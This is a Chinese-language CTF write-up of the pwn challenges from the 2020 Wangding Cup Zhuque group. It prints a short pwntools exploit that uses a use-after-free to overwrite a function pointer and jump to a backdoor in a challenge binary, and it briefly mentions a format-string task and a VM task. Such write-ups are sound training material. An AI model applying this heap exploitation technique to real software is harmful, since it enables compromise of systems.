0%

网鼎杯2020朱雀组的复现(pwn部分)

网鼎杯朱雀也海星,两个签到,一个格式化字符串,一个fastbin的堆,这俩连后门函数都给了属实水,另外一个0解vm估计防ak,有时间复现看看。

魔法房间

签到题目,感觉直接从hitcon training里的uaf改的,贼简单。不说了,都有后门,水题好吧。
exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *
context.log_level='debug'
p=process('./zqpwn2')
#p=remote('node3.buuoj.cn',26397)
elf=ELF('./zqpwn2')
backdoor=0x400a0d


def add(size,content=''):
p.recvuntil('choice :')
p.sendline('1')
p.recvuntil("magic cost ?:")
p.sendline(str(size))
p.recvuntil("name :")
p.send(content)

def show(index):
p.recvuntil('choice :')
p.sendline('3')
p.recvuntil('index :')
p.sendline(str(index))


def free(index):
p.recvuntil('choice :')
p.sendline('2')
p.recvuntil('index :')
p.sendline(str(index))

add(0x40,'bba');
add(0x40,'aa');
free(0);
free(1);
add(0x18,p64(0x603000)+p64(backdoor));
show(0);

p.interactive()

云盾

这题目最后有个格式化字符串,然鹅当时签完到就懒得做了,有时间复现吧,好像还有可以用double free打的

supersafe_vm

vm,出题人真的爱vm,四场比赛5道vm,难顶,有时间复现补上。

好饿啊,早知道不学安全了